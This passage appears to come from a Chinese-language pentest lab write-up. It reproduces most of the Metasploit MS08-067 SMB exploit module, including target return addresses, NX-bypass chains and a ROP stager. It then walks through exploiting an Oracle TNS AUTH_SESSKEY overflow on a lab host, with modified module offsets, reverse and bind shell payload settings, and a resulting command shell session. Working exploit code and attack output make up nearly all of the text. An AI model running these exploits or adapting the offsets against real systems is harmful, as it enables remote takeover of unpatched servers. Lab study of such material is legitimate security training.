                  'Scratch'   => 0x00020408
                }
              ], # JMP ESI WS2HELP.DLL
    
              # Brett Moore's crafty NX bypass for 2003 SP1
              # Added by Omar MEZRAG - 0xFFFFFF
              [ 'Windows 2003 SP1 French (NX)',
                {
                  'RetDec'    => 0x7CA2568C,  # dec ESI, ret @SHELL32.DLL
                  'RetPop'    => 0x7CB47CF4,  # push ESI, pop EBP, ret 4 @SHELL32.DLL
                  'JmpESP'    => 0x7C98FED3,  # jmp ESP @NTDLL.DLL
                  'DisableNX' => 0x7C95E413,  # NX disable @NTDLL.DLL
                  'Scratch'   => 0x00020408
                }
              ],
    
              # Standard return-to-ESI without NX bypass
              ['Windows 2003 SP2 English (NO NX)',
               {
                 'Ret'       => 0x71bf3969,
                 'Scratch'   => 0x00020408,
               }
              ], # JMP ESI WS2HELP.DLL
    
              # Brett Moore's crafty NX bypass for 2003 SP2
              ['Windows 2003 SP2 English (NX)',
               {
                 'RetDec'    => 0x7c86beb8,  # dec ESI, ret @NTDLL.DLL
                 'RetPop'    => 0x7ca1e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
                 'JmpESP'    => 0x7c86a01b,  # jmp ESP @NTDLL.DLL
                 'DisableNX' => 0x7c83f517,  # NX disable @NTDLL.DLL
                 'Scratch'   => 0x00020408,
               }
              ],
    
              # Standard return-to-ESI without NX bypass
              ['Windows 2003 SP2 German (NO NX)',
               {
                 'Ret'       => 0x71a03969,
                 'Scratch'   => 0x00020408,
               }
              ], # JMP ESI WS2HELP.DLL
    
              # Brett Moore's crafty NX bypass for 2003 SP2
              ['Windows 2003 SP2 German (NX)',
               {
                 'RetDec'    => 0x7c98beb8,  # dec ESI, ret @NTDLL.DLL
                 'RetPop'    => 0x7cb3e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
                 'JmpESP'    => 0x7c98a01b,  # jmp ESP @NTDLL.DLL
                 'DisableNX' => 0x7c95f517,  # NX disable @NTDLL.DLL
                 'Scratch'   => 0x00020408,
               }
              ],
    
              # Brett Moore's crafty NX bypass for 2003 SP2
              [ 'Windows 2003 SP2 Portuguese (NX)',
                {
                  'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL OK
                  'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL OK
                  'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL OK
                  'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
                  'Scratch'   => 0x00020408,
                }
              ],
    
              # Brett Moore's crafty NX bypass for 2003 SP2 (target by Anderson Bargas)
              [ 'Windows 2003 SP2 Portuguese - Brazilian (NX)',
                {
                  'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL OK
                  'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL OK
                  'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL OK
                  'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
                  'Scratch'   => 0x00020408,
                }
              ],
    
              # Standard return-to-ESI without NX bypass
              ['Windows 2003 SP2 Spanish (NO NX)',
               {
                 'Ret'       => 0x71ac3969,
                 'Scratch'   => 0x00020408,
               }
              ], # JMP ESI WS2HELP.DLL
    
              # Brett Moore's crafty NX bypass for 2003 SP2
              ['Windows 2003 SP2 Spanish (NX)',
               {
                 'RetDec'    => 0x7c86beb8,  # dec ESI, ret @NTDLL.DLL
                 'RetPop'    => 0x7ca1e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
                 'JmpESP'    => 0x7c86a01b,  # jmp ESP @NTDLL.DLL
                 'DisableNX' => 0x7c83f517,  # NX disable @NTDLL.DLL
                 'Scratch'   => 0x00020408,
               }
              ],
    
              # Standard return-to-ESI without NX bypass
              # Provided by Masashi Fujiwara
              ['Windows 2003 SP2 Japanese (NO NX)',
               {
                 'Ret'       => 0x71a91ed2,
                 'Scratch'   => 0x00020408
               }
              ], # JMP ESI WS2HELP.DLL
    
              # Standard return-to-ESI without NX bypass
              # Added by Omar MEZRAG - 0xFFFFFF
              [ 'Windows 2003 SP2 French (NO NX)',
                {
                  'Ret'       => 0x71AC2069,
                  'Scratch'   => 0x00020408
                }
              ], # CALL ESI WS2HELP.DLL
    
              # Brett Moore's crafty NX bypass for 2003 SP2
              # Added by Omar MEZRAG - 0xFFFFFF
              [ 'Windows 2003 SP2 French (NX)',
                {
                  'RetDec'    => 0x7C98BEB8,  # dec ESI, ret @NTDLL.DLL
                  'RetPop'    => 0x7CB3E84E,  # push ESI, pop EBP, ret @SHELL32.DLL
                  'JmpESP'    => 0x7C98A01B,  # jmp ESP @NTDLL.DLL
                  'DisableNX' => 0x7C95F517,  # NX disable @NTDLL.DLL
                  'Scratch'   => 0x00020408
                }
              ],
    
              # Brett Moore's crafty NX bypass for 2003 SP2
              [ 'Windows 2003 SP2 Chinese - Simplified (NX)',
                {
                  'RetDec'    => 0x7c99beb8,  # dec ESI, ret @NTDLL.DLL
                  'RetPop'    => 0x7cb5e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
                  'JmpESP'    => 0x7c99a01b,  # jmp ESP @NTDLL.DLL
                  'DisableNX' => 0x7c96f517,  # NX disable @NTDLL.DLL
                  'Scratch'   => 0x00020408,
                }
              ],
    
              # Brett Moore's crafty NX bypass for 2003 SP2
              [ 'Windows 2003 SP2 Czech (NX)',
                {
                  'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
                  'RetPop'    => 0x7cb1e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
                  'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
                  'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
                  'Scratch'   => 0x00020408,
                }
              ],
    
              # Brett Moore's crafty NX bypass for 2003 SP2
              [ 'Windows 2003 SP2 Dutch (NX)',
                {
                  'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
                  'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
                  'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
                  'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
                  'Scratch'   => 0x00020408,
                }
              ],
    
              # Brett Moore's crafty NX bypass for 2003 SP2
              [ 'Windows 2003 SP2 Hungarian (NX)',
                {
                  'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
                  'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
                  'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
                  'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
                  'Scratch'   => 0x00020408,
                }
              ],
    
              # Brett Moore's crafty NX bypass for 2003 SP2
              [ 'Windows 2003 SP2 Italian (NX)',
                {
                  'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
                  'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
                  'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
                  'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
                  'Scratch'   => 0x00020408,
                }
              ],
    
              # Brett Moore's crafty NX bypass for 2003 SP2
              [ 'Windows 2003 SP2 Russian (NX)',
                {
                  'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
                  'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
                  'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
                  'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
                  'Scratch'   => 0x00020408,
                }
              ],
    
              # Brett Moore's crafty NX bypass for 2003 SP2
              [ 'Windows 2003 SP2 Swedish (NX)',
                {
                  'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL
                  'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
                  'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL
                  'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL
                  'Scratch'   => 0x00020408,
                }
              ],
    
              # Brett Moore's crafty NX bypass for 2003 SP2
              [ 'Windows 2003 SP2 Turkish (NX)',
                {
                  'RetDec'    => 0x7c96beb8,  # dec ESI, ret @NTDLL.DLL
                  'RetPop'    => 0x7cb1e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
                  'JmpESP'    => 0x7c96a01b,  # jmp ESP @NTDLL.DLL
                  'DisableNX' => 0x7c93f517,  # NX disable @NTDLL.DLL
                  'Scratch'   => 0x00020408,
                }
              ],
    
              #
              # Missing Targets
              # Key:   T=TODO   ?=UNKNOWN   U=UNRELIABLE
              #
              # [?] Windows Vista SP0 - Not tested yet
              # [?] Windows Vista SP1 - Not tested yet
              #
            ],
    
          'DisclosureDate' => '2008-10-28'))
    
        register_options(
          [
            OptString.new('SMBPIPE', [true,  'The pipe name to use (BROWSER, SRVSVC)', 'BROWSER']),
          ])
    
        deregister_options('SMB::ProtocolVersion')
      end
    
      #
      #
      #   *** WINDOWS XP SP2/SP3 TARGETS ***
      #
      #
      #   This exploit bypasses NX/NX by returning to a function call inside acgenral.dll that disables NX
      #   for the process and then returns back to a call ESI instruction. These addresses are different
      #   between operating systems, service packs, and language packs, but the steps below can be used to
      #   add new targets.
      #
      #
      #   If the target system does not have NX/NX, just place a "call ESI" return into both the Ret	and
      #   DisableNX elements of the target hash.
      #
      #   If the target system does have NX/NX, obtain a copy of the acgenral.dll from that system.
      #   First obtain the value for the Ret element of the hash with the following command:
      #
      #   $ msfpescan -j esi acgenral.dll
      #
      #   Pick whatever address you like, just make sure it does not contain 00 0a 0d 5c 2f or 2e.
      #
      #   Next, find the location of the function we use to disable NX. Use the following command:
      #
      #   $ msfpescan -r "\x6A\x04\x8D\x45\x08\x50\x6A\x22\x6A\xFF" acgenral.dll
      #
      #   This address should be placed into the DisableNX element of the target hash.
      #
      #   The Scratch element of 0x00020408 should work on all versions of Windows
      #
      #   The actual function we use to disable NX looks like this:
      #
      #     push    4
      #     lea     eax, [ebp+arg_0]
      #     push    eax
      #     push    22h
      #     push    0FFFFFFFFh
      #     mov     [ebp+arg_0], 2
      #     call    ds:__imp__NtSetInformationProcess@16
      #
      #
      #   *** WINDOWS XP NON-NX TARGETS ***
      #
      #
      #   Instead of bypassing NX, just return directly to a "JMP ESI", which takes us to the short
      #   jump, and finally the shellcode.
      #
      #
      #   *** WINDOWS 2003 SP2 TARGETS ***
      #
      #
      #   There are only two possible ways to return to NtSetInformationProcess on Windows 2003 SP2,
      #   both of these are inside NTDLL.DLL and use a return method that is not directly compatible
      #   with our call stack. To solve this, Brett Moore figured out a multi-step return call chain
      #   that eventually leads to the NX bypass function.
      #
      #
      #   *** WINDOWS 2000 TARGETS ***
      #
      #
      #   No NX to bypass, just return directly to a "JMP EDX", which takes us to the short
      #   jump, and finally the shellcode.
      #
      #
      #   *** WINDOWS VISTA TARGETS ***
      #
      #   Currently untested, will involve ASLR and NX, should be fun.
      #
      #
      #   *** NetprPathCanonicalize IDL ***
      #
      #
      #   NET_API_STATUS NetprPathCanonicalize(
      #   [in, string, unique] SRVSVC_HANDLE ServerName,
      #   [in, string] WCHAR* PathName,
      #   [out, size_is(OutbufLen)] unsigned char* Outbuf,
      #   [in, range(0,64000)] DWORD OutbufLen,
      #   [in, string] WCHAR* Prefix,
      #   [in, out] DWORD* PathType,
      #   [in] DWORD Flags
      #   );
      #
    
      def exploit
        begin
          connect(versions: [1])
          smb_login
        rescue Rex::Proto::SMB::Exceptions::LoginError => e
          if e.message =~ /Connection reset/
            print_error('Connection reset during login')
            print_error('This most likely means a previous exploit attempt caused the service to crash')
            return
          else
            raise e
          end
        end
    
        # Use a copy of the target
        mytarget = target
    
        if target['auto']
    
          mytarget = nil
    
          print_status('Automatically detecting the target...')
          fprint = smb_fingerprint
    
          print_status("Fingerprint: #{fprint['os']} - #{fprint['sp']} - lang:#{fprint['lang']}")
    
          # Bail early on unknown OS
          if (fprint['os'] == 'Unknown')
            fail_with(Failure::NoTarget, 'No matching target')
          end
    
          # Windows 2000 is mostly universal
          if (fprint['os'] == 'Windows 2000')
            mytarget = targets[1]
          end
    
          # Windows XP SP0/SP1 is mostly universal
          if fprint['os'] == 'Windows XP' and fprint['sp'] == 'Service Pack 0 / 1'
            mytarget = targets[2]
          end
    
          # Windows 2003 SP0 is mostly universal
          if fprint['os'] == 'Windows 2003' and fprint['sp'].empty?
            mytarget = targets[3]
          end
    
          # Windows 2003 R2 is treated the same as 2003
          if (fprint['os'] == 'Windows 2003 R2')
            fprint['os'] = 'Windows 2003'
          end
    
          # Service Pack match must be exact
          if (not mytarget) and fprint['sp'].index('+')
            print_error('Could not determine the exact service pack')
            print_error("Auto-targeting failed, use 'show targets' to manually select one")
            disconnect
            return
          end
    
          # Language Pack match must be exact or we default to English
          if (not mytarget) and fprint['lang'] == 'Unknown'
            print_status('We could not detect the language pack, defaulting to English')
            fprint['lang'] = 'English'
          end
    
          # Normalize the service pack string
          fprint['sp'].gsub!(/Service Pack\s+/, 'SP')
    
          unless mytarget
            targets.each do |t|
              # Prefer AlwaysOn NX over NX, and NX over non-NX
              if t.name =~ /#{fprint['os']} #{fprint['sp']} #{fprint['lang']} \(AlwaysOn NX\)/
                mytarget = t
                break
              end
              if t.name =~ /#{fprint['os']} #{fprint['sp']} #{fprint['lang']} \(NX\)/
                mytarget = t
                break
              end
            end
          end
    
          unless mytarget
            fail_with(Failure::NoTarget, 'No matching target')
          end
    
          print_status("Selected Target: #{mytarget.name}")
        end
    
        #
        # Build the malicious path name
        #
    
        padder = [*('A'..'Z')]
        pad = 'A'
        while pad.length < 7
          c = padder[rand(padder.length)]
          next if pad.index(c)
          pad += c
        end
    
        prefix = '\\'
        path   = ''
        server = Rex::Text.rand_text_alpha(rand(8) + 1).upcase
    
        #
        # Windows 2003 SP2 (NX) targets
        #
        if mytarget['RetDec']
    
          jumper = Rex::Text.rand_text_alpha(70).upcase
          jumper[ 0, 4] = [mytarget['RetDec']].pack('V') # one more to Align and make room
    
          jumper[ 4, 4] = [mytarget['RetDec']].pack('V') # 4 more for space
          jumper[ 8, 4] = [mytarget['RetDec']].pack('V')
          jumper[ 12, 4] = [mytarget['RetDec']].pack('V')
          jumper[ 16, 4] = [mytarget['RetDec']].pack('V')
    
          jumper[ 20, 4] = [mytarget['RetPop']].pack('V') # pop to EBP
          jumper[ 24, 4] = [mytarget['DisableNX']].pack('V')
    
          jumper[ 56, 4] = [mytarget['JmpESP']].pack('V')
          jumper[ 60, 4] = [mytarget['JmpESP']].pack('V')
          jumper[ 64, 2] = "\xeb\x02"                    # our jump
          jumper[ 68, 2] = "\xeb\x62"                    # original
    
          path =
            Rex::Text.to_unicode('\\') +
    
            # This buffer is removed from the front
            Rex::Text.rand_text_alpha(100) +
    
            # Shellcode
            payload.encoded +
    
            # Relative path to trigger the bug
            Rex::Text.to_unicode('\\..\\..\\') +
    
            # Extra padding
            Rex::Text.to_unicode(pad) +
    
            # Writable memory location (static)
            [mytarget['Scratch']].pack('V') + # EBP
    
            # Return to code which disables NX (or just the return)
            [mytarget['RetDec']].pack('V') +
    
            # Padding with embedded jump
            jumper +
    
            # NULL termination
            "\x00" * 2
    
        #
        # Windows XP SP2/SP3 ROP Stager targets
        #
        elsif mytarget['UseROP']
    
          rop = generate_rop(mytarget['UseROP'])
    
          path =
            Rex::Text.to_unicode('\\') +
    
            # This buffer is removed from the front
            Rex::Text.rand_text_alpha(100) +
    
            # Shellcode
            payload.encoded +
    
            # Relative path to trigger the bug
            Rex::Text.to_unicode('\\..\\..\\') +
    
            # Extra padding
            Rex::Text.to_unicode(pad) +
    
            # ROP Stager
            rop +
    
            # Padding (skipped)
            Rex::Text.rand_text_alpha(2) +
    
            # NULL termination
            "\x00" * 2
    
        #
        # Windows 2000, XP (NX), and 2003 (NO NX) targets
        #
        else
    
          jumper = Rex::Text.rand_text_alpha(70).upcase
          jumper[ 4, 4] = [mytarget.ret].pack('V')
          jumper[50, 8] = make_nops(8)
          jumper[58, 2] = "\xeb\x62"
    
          path =
            Rex::Text.to_unicode('\\') +
    
            # This buffer is removed from the front
            Rex::Text.rand_text_alpha(100) +
    
            # Shellcode
            payload.encoded +
    
            # Relative path to trigger the bug
            Rex::Text.to_unicode('\\..\\..\\') +
    
            # Extra padding
            Rex::Text.to_unicode(pad) +
    
            # Writable memory location (static)
            [mytarget['Scratch']].pack('V') + # EBP
    
            # Return to code which disables NX (or just the return)
            [mytarget['DisableNX'] || mytarget.ret].pack('V') +
    
            # Padding with embedded jump
            jumper +
    
            # NULL termination
            "\x00" * 2
    
        end
    
        handle = dcerpc_handle(
          '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
          'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
        )
    
        dcerpc_bind(handle)
    
        stub =
          NDR.uwstring(server) +
          NDR.UnicodeConformantVaryingStringPreBuilt(path) +
          NDR.long(rand(1024)) +
          NDR.wstring(prefix) +
          NDR.long(4097) +
          NDR.long(0)
    
        # NOTE: we don't bother waiting for a response here...
        print_status('Attempting to trigger the vulnerability...')
        dcerpc.call(0x1f, stub, false)
    
        # Cleanup
        handler
        disconnect
      end
    
      def check
        begin
          connect(versions: [1])
          smb_login
        rescue Rex::ConnectionError => e
          vprint_error("Connection failed: #{e.class}: #{e}")
          return Msf::Exploit::CheckCode::Unknown
        rescue Rex::Proto::SMB::Exceptions::LoginError => e
          if e.message =~ /Connection reset/
            vprint_error('Connection reset during login')
            vprint_error('This most likely means a previous exploit attempt caused the service to crash')
            return Msf::Exploit::CheckCode::Unknown
          else
            raise e
          end
        end
    
        #
        # Build the malicious path name
        # 5b878ae7 "db @eax;g"
        prefix = '\\'
        path =
          "\x00\\\x00/" * 0x10 +
          Rex::Text.to_unicode('\\') +
          Rex::Text.to_unicode('R7') +
          Rex::Text.to_unicode('\\..\\..\\') +
          Rex::Text.to_unicode('R7') +
          "\x00" * 2
    
        server = Rex::Text.rand_text_alpha(rand(8) + 1).upcase
    
        handle = dcerpc_handle('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
                               'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
        )
    
        begin
          # Samba doesn't have this handle and returns an ErrorCode
          dcerpc_bind(handle)
        rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
          vprint_error("SMB error: #{e.message}")
          return Msf::Exploit::CheckCode::Safe
        end
    
        vprint_status('Verifying vulnerable status... (path: 0x%08x)' % path.length)
    
        stub =
          NDR.uwstring(server) +
          NDR.UnicodeConformantVaryingStringPreBuilt(path) +
          NDR.long(8) +
          NDR.wstring(prefix) +
          NDR.long(4097) +
          NDR.long(0)
    
        resp = dcerpc.call(0x1f, stub)
        error = resp[4, 4].unpack('V')[0]
    
        # Cleanup
        simple.client.close
        simple.client.tree_disconnect
        disconnect
    
        if (error == 0x0052005c) # \R :)
          return Msf::Exploit::CheckCode::Vulnerable
        else
          vprint_error('System is not vulnerable (status: 0x%08x)' % error) if error
          return Msf::Exploit::CheckCode::Safe
        end
      end
    
      def generate_rop(version)
        free_byte = "\x90"
        # free_byte = "\xcc"
    
        # create a few small gadgets
        #  <free byte>; pop edx; pop ecx; ret
        gadget1 = free_byte + "\x5a\x59\xc3"
        #  mov edi, eax; add edi,0xc; push 0x40; pop ecx; rep movsd
        gadget2 = free_byte + "\x89\xc7" + "\x83\xc7\x0c" + "\x6a\x7f" + "\x59" + "\xf2\xa5" + free_byte
        #  <must complete \x00 two byte opcode>; <free_byte>; jmp $+0x5c
        gadget3 = "\xcc" + free_byte + "\xeb\x5a"
    
        # gadget2:
        #  get eax into edi
        #  adjust edi
        #  get 0x7f in ecx
        #  copy the data
        #  jmp to it
        #
        dws = gadget2.unpack('V*')
    
        ##
        # Create the ROP stager, pfew.. Props to corelanc0d3r!
        # This was no easy task due to space limitations :-/
        # -jduck
        ##
        module_name = 'ACGENRAL.DLL'
        module_base = 0x6f880000
    
        rvasets = {}
        # XP SP2
        rvasets['5.1.2600.2180'] = {
          # call [imp_HeapCreate] / mov [0x6f8b8024], eax / ret
          'call_HeapCreate'                          => 0x21064,
          'add eax, ebp / mov ecx, 0x59ffffa8 / ret' => 0x2e546,
          'pop ecx / ret'                            => 0x2e546 + 6,
          'mov [eax], ecx / ret'                     => 0xd182,
          'jmp eax'                                  => 0x19b85,
          'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret' => 0x10976,
          'mov [eax+0x10], ecx / ret'                => 0x10976 + 6,
          'add eax, 8 / ret'                         => 0x29a14
        }
    
        # XP SP3
        rvasets['5.1.2600.5512'] = {
          # call [imp_HeapCreate] / mov [0x6f8b02c], eax / ret
          'call_HeapCreate'                          => 0x21286,
          'add eax, ebp / mov ecx, 0x59ffffa8 / ret' => 0x2e796,
          'pop ecx / ret'                            => 0x2e796 + 6,
          'mov [eax], ecx / ret'                     => 0xd296,
          'jmp eax'                                  => 0x19c6f,
          'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret' => 0x10a56,
          'mov [eax+0x10], ecx / ret'                => 0x10a56 + 6,
          'add eax, 8 / ret'                         => 0x29c64
        }
    
        # HeapCreate ROP Stager from ACGENRAL.DLL 5.1.2600.2180
        rop = [
          # prime ebp (adjustment distance)
          0x00018000,
    
          # get some RWX memory via HeapCreate
          'call_HeapCreate',
          0x01040110, # flOptions (gets & with 0x40005)
          0x01010101,
          0x01010101,
    
          # adjust the returned pointer
          'add eax, ebp / mov ecx, 0x59ffffa8 / ret',
    
          # setup gadget1
          'pop ecx / ret',
          gadget1.unpack('V').first,
          'mov [eax], ecx / ret',
    
          # execute gadget1
          'jmp eax',
    
          # setup gadget2 (via gadget1)
          dws[0],
          dws[1],
          'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret',
    
          # setup part3 of gadget2
          'pop ecx / ret',
          dws[2],
          'mov [eax+0x10], ecx / ret',
    
          # execute gadget2
          'add eax, 8 / ret',
          'jmp eax',
    
          # gadget3 gets executed after gadget2 (luckily)
          gadget3.unpack('V').first
        ]
    
        # convert the meta rop into concrete bytes
        rvas = rvasets[version]
    
        rop.map! { |e|
          if e.kind_of? String
            # Meta-replace (RVA)
            fail_with(Failure::BadConfig, "Unable to locate key: \"#{e}\"") unless rvas[e]
            module_base + rvas[e]
    
          elsif e == :unused
            # Randomize
            rand_text(4).unpack('V').first
    
          else
            # Literal
            e
          end
        }
    
        ret = rop.pack('V*')
    
        # check badchars?
        # idx = Rex::Text.badchar_index(ret, payload_badchars)
    
        ret
      end
    end
    

    Oracle tns_auth_sesskey

    use exploit/windows/oracle/tns_auth_sesskey
    set payload windows/meterpreter/reverse_tcp
    set RHOSTS 10.10.10.130
    set LHOST 10.10.10.128
    set LPORT 5000
    set target 1
    exploit
    
    msf6 exploit(windows/oracle/tns_auth_sesskey) > exploit
    [*] Started reverse TCP handler on 10.10.10.128:5000
    [*] 10.10.10.130:1521 - Attacking using target "Oracle 10.2.0.1.0 Enterprise Edition"
    [*] 10.10.10.130:1521 - Sending NSPTCN packet ...
    [*] 10.10.10.130:1521 - Re-sending NSPTCN packet ...
    [*] 10.10.10.130:1521 - Sending NA packet ...
    [*] 10.10.10.130:1521 - Sending TTIPRO packet ...
    [*] 10.10.10.130:1521 - Sending TTIDTY packet ...
    [*] 10.10.10.130:1521 - Calling OSESSKEY ...
    [*] 10.10.10.130:1521 - Calling kpoauth with long AUTH_SESSKEY ...
    [*] Exploit completed, but no session was created.
    

    提示“no session was created”

    根据书中提示信息,修改tns_auth_sesskey.rb源代码

    C:\metasploit-framework\embedded\framework\modules\exploits\windows\oracle\tns_auth_sesskey.rb
    
        # build exploit buffer
        print_status("Calling kpoauth with long AUTH_SESSKEY ...")
        sploit = payload.encoded
        sploit << rand_text_alphanumeric(0x19a - 0x17e)
        sploit << generate_seh_record(mytarget.ret)
        distance = payload_space + 8 + 5
        sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
    
        # ensure bad ptr is derefed
        value = rand(0x3fffffff) | 0xc0000000
        sploit[0x17e,4] = [value].pack('V')
    
        # send overflow trigger packet (call kpoauth)
        params = []
        params << {
          'Name'   => 'AUTH_SESSKEY',
          'Value'  => sploit,
          'Flag'   => 1
        }
        dtyauth_pkt = dtyauth_packet(0x73, username, 0x121, params)
        sock.put(dtyauth_pkt)
    

    修改为

        # build exploit buffer
        print_status("Calling kpoauth with long AUTH_SESSKEY ...")
        sploit = payload.encoded
        sploit << rand_text_alphanumeric(0x19a - 0x17e + 0x10)
        sploit << generate_seh_record(mytarget.ret)
        distance = payload_space + 8 + 5 + 0x20
        sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
    
        # ensure bad ptr is derefed
        value = rand(0x3fffffff) | 0xc0000000
        sploit[0x17e,4] = [value].pack('V')
    
        # send overflow trigger packet (call kpoauth)
        params = []
        params << {
          'Name'   => 'AUTH_SESSKEY',
          'Value'  => sploit,
          'Flag'   => 1
        }
        dtyauth_pkt = dtyauth_packet(0x73, username, 0x121, params)
        sock.put(dtyauth_pkt)
    

    根据桌面上的oracle startup.txt中提示信息,启动Oracle
    在这里插入图片描述

    C:\oracle\product\10.2.0\db_1\BIN\sqlplus.exe /nolog
    conn sys/mima1234 as sysdba
    startup
    

    在这里插入图片描述

    msf6 exploit(windows/oracle/tns_auth_sesskey) > rexploit
    [*] Reloading module...
    
    [*] Started reverse TCP handler on 10.10.10.128:5000
    [*] 10.10.10.130:1521 - Attacking using target "Oracle 10.2.0.1.0 Enterprise Edition"
    [*] 10.10.10.130:1521 - Sending NSPTCN packet ...
    [*] 10.10.10.130:1521 - Re-sending NSPTCN packet ...
    [*] 10.10.10.130:1521 - Sending NA packet ...
    [*] 10.10.10.130:1521 - Sending TTIPRO packet ...
    [*] 10.10.10.130:1521 - Sending TTIDTY packet ...
    [*] 10.10.10.130:1521 - Calling OSESSKEY ...
    [*] 10.10.10.130:1521 - Calling kpoauth with long AUTH_SESSKEY ...
    [*] Sending stage (175174 bytes) to 10.10.10.130
    [*] Sending stage (175174 bytes) to 10.10.10.130
    [*] Sending stage (175174 bytes) to 10.10.10.130
    [*] Sending stage (175174 bytes) to 10.10.10.130
    [*] Sending stage (175174 bytes) to 10.10.10.130
    [*] Sending stage (175174 bytes) to 10.10.10.130
    [*] Sending stage (175174 bytes) to 10.10.10.130
    [*] Exploit completed, but no session was created.
    

    提示“no session was created”,更换payload为windows/shell/bind_tcp

    use exploit/windows/oracle/tns_auth_sesskey
    set payload windows/shell/bind_tcp
    set RHOSTS 10.10.10.130
    set LHOST 10.10.10.128
    set LPORT 4555
    set target 1
    exploit
    
    msf6 exploit(windows/oracle/tns_auth_sesskey) > exploit
    
    [*] 10.10.10.130:1521 - Attacking using target "Oracle 10.2.0.1.0 Enterprise Edition"
    [*] 10.10.10.130:1521 - Sending NSPTCN packet ...
    [*] 10.10.10.130:1521 - Re-sending NSPTCN packet ...
    [*] 10.10.10.130:1521 - Sending NA packet ...
    [*] 10.10.10.130:1521 - Sending TTIPRO packet ...
    [*] 10.10.10.130:1521 - Sending TTIDTY packet ...
    [*] 10.10.10.130:1521 - Calling OSESSKEY ...
    [*] 10.10.10.130:1521 - Calling kpoauth with long AUTH_SESSKEY ...
    [*] Started bind TCP handler against 10.10.10.130:4555
    [*] Encoded stage with x86/shikata_ga_nai
    [*] Sending encoded stage (267 bytes) to 10.10.10.130
    [*] Command shell session 26 opened (10.10.10.128:3719 -> 10.10.10.130:4555 ) at 2022-04-23 20:10:07 +0800
    
    
    Shell Banner:
    Microsoft Windows [Version 5.2.3790]
    -----
    
    
    C:\oracle\product\10.2.0\db_1\DATABASE>ipconfig
    ipconfig
    
    Windows IP Configuration
    
    
    Ethernet adapter Local Area Connection:
    
       Connection-specific DNS Suffix  . :
       IP Address. . . . . . . . . . . . : 10.10.10.130
       Subnet Mask . . . . . . . . . . . : 255.255.255.0
       Default Gateway . . . . . . . . . : 10.10.10.254
    
    C:\oracle\product\10.2.0\db_1\DATABASE>systeminfo
    systeminfo
    
    Host Name:                 ROOT-TVI862UBEH
    OS Name:                   Microsoft(R) Windows(R) Server 2003, Enterprise Edition
    OS Version:                5.2.3790 Build 3790
    OS Manufacturer:           Microsoft Corporation
    OS Configuration:          Standalone Server
    OS Build Type:             Uniprocessor Free
    Registered Owner:          root
    Registered Organization:
    Product ID:                69713-640-9722366-45109
    Original Install Date:     11/15/2011, 9:50:15 PM
    System Up Time:            242 Days, 0 Hours, 52 Minutes, 4 Seconds
    System Manufacturer:       VMware, Inc.
    System Model:              VMware Virtual Platform
    System Type:               X86-based PC
    Processor(s):              1 Processor(s) Installed.
                               [01]: x86 Family 6 Model 14 Stepping 10 GenuineIntel ~2112 Mhz
    BIOS Version:              INTEL  - 6040000
    Windows Directory:         C:\WINDOWS
    System Directory:          C:\WINDOWS\system32
    Boot Device:               \Device\HarddiskVolume1
    System Locale:             en-us;English (United States)
    Input Locale:              en-us;English (United States)
    Time Zone:                 (GMT+08:00) Beijing, Chongqing, Hong Kong, Urumqi
    Total Physical Memory:     767 MB
    Available Physical Memory: 67 MB
    Page File: Max Size:       2,474 MB
    Page File: Available:      1,295 MB
    Page File: In Use:         1,179 MB
    Page File Location(s):     C:\pagefile.sys
    Domain:                    WORKGROUP
    Logon Server:              N/A
    Hotfix(s):                 3 Hotfix(s) Installed.
                               [01]: File 1
                               [02]: Q147222
                               [03]: KB893803v2 - Update
